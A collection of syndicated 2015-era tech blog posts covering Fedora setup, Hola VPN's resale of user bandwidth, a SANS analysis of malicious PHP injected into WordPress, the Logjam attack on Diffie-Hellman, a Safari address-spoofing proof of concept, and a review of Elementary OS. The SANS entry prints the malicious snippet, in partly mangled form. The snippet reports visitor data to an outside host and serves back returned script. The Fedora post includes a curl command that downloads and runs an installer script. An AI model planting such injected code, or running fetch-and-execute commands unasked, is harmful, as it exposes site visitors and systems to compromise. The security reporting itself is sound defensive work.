You have to install two repositories – Free and Non-free. It’s extremely simple to add these repositories to your system; just open the RPM Fusion website. There you will find links for different versions of Fedora. Click on the link for your version of Fedora and it will install that repo on your system through the ‘Software’ app. It’s recommended to first install the ‘Free’ repo and then the ‘Non-Free’ one.

fedora rpmfusion

Once these two repos are installed we now have access to many more applications.

Install VLC Media Player

VLC is the the swiss knife of media players. It can play virtually every media format out there. Since the RPMFusion repos are already installed you can install VLC using ‘dnf':

sudo dnf install vlc

Install Clementine

As much as I like Gnome, the default desktop environment of Fedora, I am not a huge fan of the painfully simple Rhythmbox. I always install the ‘Clementine’ music player which not only has a nicer interface, but also comes with more features. You can install Clementine by running:

sudo dnf install clementine

Install MP3 codecs

Fedora’s focus on FOSS-only software packages does make it more challenging to get stuff like mp3 files to work. I used to install gstreamer plugins for mp3 support, but I faced some problems in Fedora 22. So I resorted to another nifty tool called Fedy. Since Fedy does more than installing codecs, I will talk about it separately.

Get Fedy, before you get fed-up

Fedy is a ‘jack of all trades’ kind of tool. Install Fedy using the following command:

$ su -c "curl https://satya164.github.io/fedy/fedy-installer -o fedy-installer && chmod +x fedy-installer && ./fedy-installer"

Once installed, you will see there are broadly two kinds of tasks you can perform using Fedy: install new packages and tweak the system. Under the ‘Apps’ tab you will find the option to install ‘multimedia codecs’ which will also bring ‘mp3′ support to your system.

Just scroll through it and see what else you want to install. Two of my favorite packages, in addition to codecs, are Microsoft fonts (for better font rendering) and Sublime Text.

fedora fedy

There are chances that a font may look ugly in Fedora. This problem isn’t unique to Fedora; I have the same issue with Arch Linux, openSUSE or Kubuntu as well. I spend a considerate amount of time fixing fonts on these systems. Fedy has made it extremely easy to make fonts look good under Fedora with just one click. Under ‘Tweaks’ one of the most important options is ‘font rendering’, which will fix font issues on your system.

Install Gnome Tweak Tool

Gnome is the default desktop environment of Fedora and the overall Gnome experience heavily rely on extensions. And Gnome Tweak Tool is an important tool go get a pristine Gnome experience. It’s surprising to see that Tweak Tool doesn’t come pre-installed on Fedora. Comparatively openSUSE does a better job by pre-installing Tweak Tool and some useful extensions. You can install Tweak Tool in Fedora by running this command:

sudo dnf install gnome-tweak-tool

Once the tool is installed, you can manage your extensions from there. I wish the tool was able to search and install new extensions too. Currently you have to visit the Gnome Extensions site to install new extensions. Once the extension is installed, you can enable it, configure it and disable it from the Tweak Tool.

Since I have a multi-monitor set-up I grab the extension for Multiple Monitors. I also recommend ‘Dash to Dock’ which allows a user to configure the Dash. You can disable Dash from ‘autohiding’, you can change the icon size, you can even choose the location of the dash. Last, but not least, you can also extend the dash to the length of the screen just like the one in Unity. For the users of multiple monitors, there is a nifty option to show the dash on the desired monitor. It’s a must-have extension.

Install Chrome to watch Netflix

Fedora tends to offer the vanilla Gnome experience, but instead of Web, the default web browser of Gnome, it comes with Firefox. However Firefox sill doesn’t support DRMed content on Linux so you can’t watch Netflix. That’s where Google Chrome comes in handy. You can install Chrome by either downloading it from the Google site or from Fedy.

Download and install Chrome from the official site.

Cloud in your hands

If you are running your own private cloud — and you must in order to safeguard any sensitive data — you can grab the clients for Seafile or ownCloud for your system. But if you use Google Drive or Dropbox you can also use them easily on Fedora.

There are official clients for all commercial cloud services including Dropbox, with Google Drive being an exception. One of the easiest ways to get Google Drive on Linux is inSync; while it does have more features than the Google Drive client, it costs money to use. You can install inSync by downloading the official client from their website. Once installed, connect it to your Google account, point it to the location where you want your files to be saved, and you are good to take Google for a drive.

Online accounts

Despite being a Plasma user I envy the Online Accounts feature of Gnome. It makes it extremely easy to configure communication tools such as email, calendars, address book and IM.

Gnome’s Online Accounts supports more than half a dozen services including Google, Facebook, Flickr, ownCloud, etc. Open Online Accounts from the Dash and choose the service you want to configure. Once you are connected to an account, you can choose what kind of service you want to enable for that account. In case of Google, for example, I enabled all these services.

fedora online accounts

The beauty is that when I open Evolution, the default email client in Fedora, it’s already configured with that email account.

Getting non-free drivers for GPU

It’s really hard to get non-free software to work with Fedora. I use Arch Linux and I find it much easier to install Nvidia drivers on Arch than it is on Fedora. The fact is you will not need non-free drivers under Fedora as your graphics card will work out-of-the-box. However if you do need them (why would you buy an expensive Nvidia card if you can’t take full advantage of it?) then you have to do some hard work. I broke my previous Fedora installs due to non-free drivers so gave up on them. If you want to install such drivers on the Fedora box I would suggest this RPMFusion page. My free advice to you would be, don’t try it at home.

Getting your printer to work in Fedora

It’s a non-issue nowadays, depending on the make of your printer. In most cases when you run the Printer’s tool, Fedora will detect and configure your printer with one click.

That’s most of what I do on my Fedora system. A few things, mostly related to non-free software, do look more complicated under Fedora. That’s mainly due to Fedora’s policy to use and promote FOSS. Once you cross that river Fedora is a pleasant OS to use.

Now tell us what things you do after installing Fedora on your system.

TorrentFreak: Hola VPN Sells Users’ Bandwidth, Founder Confirms

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

hola-logoFaced with increasing local website censorship and Internet services that restrict access depending on where a user is based, more and more people are turning to specialist services designed to overcome such limitations.

With prices plummeting to just a few dollars a month in recent years, VPNs are now within the budgets of most people. However, there are always those who prefer to get such services for free, without giving much consideration to how that might be economically viable.

One of the most popular free VPN/geo-unblocking solutions on the planet is operated by Israel-based Hola. It can be added to most popular browsers in seconds and has an impressive seven million users on Chrome alone. Overall the company boasts 46 million users of its service.

Now, however, the company is facing accusations from 8chan message board operator Fredrick Brennan. He claims that Hola users’ computers were used to attack his website without their knowledge, and that was made possible by the way Hola is setup.

“When a user installs Hola, he becomes a VPN endpoint, and other users of the Hola network may exit through his internet connection and take on his IP. This is what makes it free: Hola does not pay for the bandwidth that its VPN uses at all, and there is no user opt out for this,” Brennan says.

This means that rather than having their IP addresses cloaked behind a private server, free Hola users are regularly exposing their IP addresses to the world but associated with other people’s traffic – no matter what that might contain.

hola-big

While this will come as a surprise to many, Hola says it has never tried to hide the methods it employs to offer a free service.

Speaking with TorrentFreak, Hola founder Ofer Vilenski says that his company offers two tiers of service – the free option (which sees traffic routed between Hola users) and a premium service, which operates like a traditional VPN.

However, Brennan says that Hola goes a step further, by selling Hola users’ bandwidth to another company.

“Hola has gotten greedy. They recently (late 2014) realized that they basically have a 9 million IP strong botnet on their hands, and they began selling access to this botnet (right now, for HTTP requests only) at https://luminati.io,” the 8chan owner says.

TorrentFreak asked Vilenski about Brennan’s claims. Again, there was no denial.

“We have always made it clear that Hola is built for the user and with the user in mind. We’ve explained the technical aspects of it in our FAQ and have always advertised in our FAQ the ability to pay for non-commercial use,” Vilenski says.

And this is how it works.

Hola generates revenue by selling a premium service to customers through its Luminati brand. The resources and bandwidth for the Luminati product are provided by Hola users’ computers when they are sitting idle. In basic terms, Hola users get their service for free as long as they’re prepared to let Hola hand their resources to Luminati for resale. Any users who don’t want this to happen can buy Hola for $5 per month.

Fair enough perhaps – but how does Luminati feature in Brennan’s problems? It appears his interest in the service was piqued after 8chan was hit by multiple denial of service attacks this week which originated from the Luminati / Hola network.

“An attacker used the Luminati network to send thousands of legitimate-looking POST requests to 8chan’s post.php in 30 seconds, representing a 100x spike over peak traffic and crashing PHP-FPM,” Brennan says.

Again, TorrentFreak asked Vilenski for his input. Again, there was no denial.

“8chan was hit with an attack from a hacker with the handle of BUI. This person then wrote about how he used the Luminati commercial VPN network to hack 8chan. He could have used any commercial VPN network, but chose to do so with ours,” Vilenski explains.

“If 8chan was harmed, then a reasonable course of action would be to obtain a court order for information and we can release the contact information of this user so that they can further pursue the damages with him.”

Vilenski says that Hola screens users of its “commercial network” (Luminati) prior to them being allowed to use it but in this case “BUI” slipped through the net. “Adjustments” have been made, Hola’s founder says.

“We have communicated directly with the founder of 8Chan to make sure that once we terminated BUI’s account they’ve had no further problems, and it seems that this is the case,” Vilenski says.

It is likely the majority of Hola’s users have no idea how the company’s business model operates, even though it is made fairly clear in its extensive FAQ/ToS. Installing a browser extension takes seconds and if it works as advertised, most people will be happy.

Whether this episode will affect Hola’s business moving forward is open to question but for those with a few dollars to spend there are plenty of options in the market. Until then, however, those looking for free options should read the small print before clicking install.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Thanks to one of our readers, for sending us this snipped of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):

#2b8008# ">">/* turn off error reporting */
@ini_set(display_errors ">/* do not display errors to the user */
$wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */

if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610)))
{ ">
# Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent]

$wp_mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua="># check if we have the curl extension installed

if (function_exists(curl_init) function_exists(curl_exec"># if we dont have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen"># or try fopen as a last resort
elseif (function_exists(fopen) function_exists(stream_get_contents)) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, r}}

if (substr($wp_8610mezd,1,3) === scr"># The data retrieved will be echoed back to the user if it starts with the string scr.

I havent been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet willbe appreciated.


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve — the most efficient algorithm for breaking a Diffie-Hellman connection — is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”

[…]

The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation — just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

SANS Internet Storm Center, InfoCON: green: Address spoofing vulnerability in Safari Web Browser, (Mon, May 18th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A new vulnerability arised in Safari Web Browser that can lead to an address spoofing allowing attackers to show any URL address while loading a different web page. While this proof of concept is not perfect, it could definitely be fixed to be used by phishing attacks very easily.

There is a proof of concept http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari Web Browser:

From same iPad using Google Chrome:

The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the real” />

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Pelez
SANS Internet Storm Center – Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: Elementary OS Freya: Is This The Next Big Linux Distro?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Freya default desktop

I’ve tried just about every flavor of Linux available. Not a desktop interface has gone by that hasn’t, in some way, touched down before me. So when I set out to start kicking the tires of Elementary OS Freya, I assumed it was going to be just another take on the same old desktop metaphors. A variation of GNOME, a tweak of Xfce, a dash of OSX or some form of Windows, and the slightest hint of Chrome OS. What I wound up seeing didn’t disappoint on that level—it was a mixed bag of those very things. However, that mixed bag turned out to be something kind of special … something every Linux user should take notice of.

Why? Because Elementary OS Freya gets a lot of things right, including some things that other distributions have failed to bring to light. True user-friendliness.

Elementary OS Freya takes all of the known elements of a good UI, blends them together, and doesn’t toss in anything extraneous that might throw the user for a loop. The end result is a desktop interface that anyone (and I do mean anyone) can use without hiccup.

Before I dive any further into this, I must say that Freya is still in beta (and has been for quite some time). That being said, the beta release of Freya is rock solid. You can download the beta here and install it alongside your current OS or as a virtual guest in VirtualBox.

With that said, let’s examine what it is about Elementary OS Freya that makes it, quite possibly, the most ideal Linux desktop distribution (and maybe what it could use to draw it nearer to perfection).

Design

This is where Freya truly nails just about every possible aspect of the desktop interface. Upon installation (or loading up the live image), you are greeted with a minimalist interface that, at first glance, looks like a take on GNOME Shell with an added dock for good measure (Figure 1).

You only need scratch the surface to find out that Freya has taken hints from nearly every major interface and rolled them into a coherent whole that will please everyone. Consider this:

  • OSX dock

  • Chrome OS menu

  • GNOME Shell panel

  • Multiple workspaces

  • OSX consistency in design

  • Ubuntu system settings

  • Ubuntu Software Center.

 Do you see where that is going? With those pieces working as a cohesive unit, the Freya desktop is already light years ahead of a number of platforms. And they do work together very well.

The foundation

Elementary OS did right by choosing Ubuntu as its foundation. With this, they receive the Ubuntu Software Center, which happens to be one of the most user-friendly package managers within the Linux ecosystem. This also adds the Ubuntu System Settings tool, which is quite simple to use (Figure 2).

Figure 2: The Elementary OS Freya System Settings tool.

Where Elementary OS Freya departs from Ubuntu (besides Unity) is the default applications. This also happens to be one area where Freya does stumble a bit. By this, I mean the default web browser. I get the desire to use Midori over the likes of Chrome or Firefox; but the reality is that choice limits the platform in a number of ways (think supported sites). For someone like me, who depends upon Google Drive, Midori simply does not work. When I try to access Google Drive, I receive the warning You are using an unsupported browser.

To get around this, I must install either Chrome or Firefox. Not a problem, of course. All I need to do is hop on over to the Software Center and install Firefox. If I want Chrome, I head over to the Chrome download location and download the installable .deb file. If you install either Chrome or Firefox, surprisingly enough, the design scheme holds true for both.

NOTE: If you want to install Chrome on the current Freya beta, I highly recommend against doing so. Every attempt to load the Chrome download page (through either Midori or Firefox) actually crashes the Freya desktop to the point where a hard restart is necessary. So install Firefox through the Software Center and then download Chrome with Firefox. I did, however, manage to download the .deb file for Chrome on one machine, transfer it (via USB), and then install Chrome on Elementary OS. Once this was done, the Chrome Download page loaded fine (from Chrome only) and Google Drive worked flawlessly.

Missing apps

Outside of a supported browser, the one area that Elementary OS needs a bit of attention is the application selection. Upon installation, you will find no sign of an office suite or graphics tool. In fact, the closest thing to a word processor is the Scratch text editor. There is no LibreOffice to be found (and with the state of Midori rendering Google Drive useless, this is an issue).

Yes, you can hop over to the Software Center and install LibreOffice, but we’re looking at a Linux desktop variant that offers one of the most well designed interfaces for new users. Why make those users jump through hoops to have what nearly every flavor of Linux installs by default? On top of that, when installing LibreOffice through the Software Center (on Elementary OS), you wind up with a very out of date iteration of the software (4.2.8.2) ─ which completely shatters the aesthetics of the platform (Figure 3).

Figure 3: An out-of-date version of LibreOffice breaks the global theme.

Including LibreOffice (and an up-to-date version at that) would take next to nothing. The latest iteration of Ubuntu (15.04) includes LibreOffice 4.4. This release of the flagship open source office suite would be much better suited for Elementary OS Freya … on every level. I highly recommend downloading the main LibreOffice installer and installing with the following steps:

  1. Open a terminal window.

  2. Change into the Downloads folder (assuming you downloaded the file there) with the command cd Downloads.

  3. Unpack the file with the command tar xvzf LibreOffice_XXX.tar.gz (Where XXX is the release number).

  4. Change into the DEBS subfolder of the newly created directory.

  5. Issue the command sudo dpkg -i *deb

Once the installation is complete, you’ll need to run the new install from the command line (since the entries for LibreOffice in the Applications menu will still be the old 4.2 release). The command to run the new version of LibreOffice is libreoffice4.4. Once opened, you can lock the launcher to the dock by right-clicking the LibreOffice icon in the dock and selecting Keep in Dock.

There is so much to love about Elementary OS Freya. Considering this platform is still in beta makes it all the more impressive. Even though there are areas that could use a bit of polish, what we are looking at could easily take over as the single most user-friendly and well designed Linux distribution to date.

Have you given Elementary OS Freya a try? If so, what was your impression? Will you be ready to hop from your current distribution to this new flavor, once it is out of beta? If not, what keeps you from jumping ship?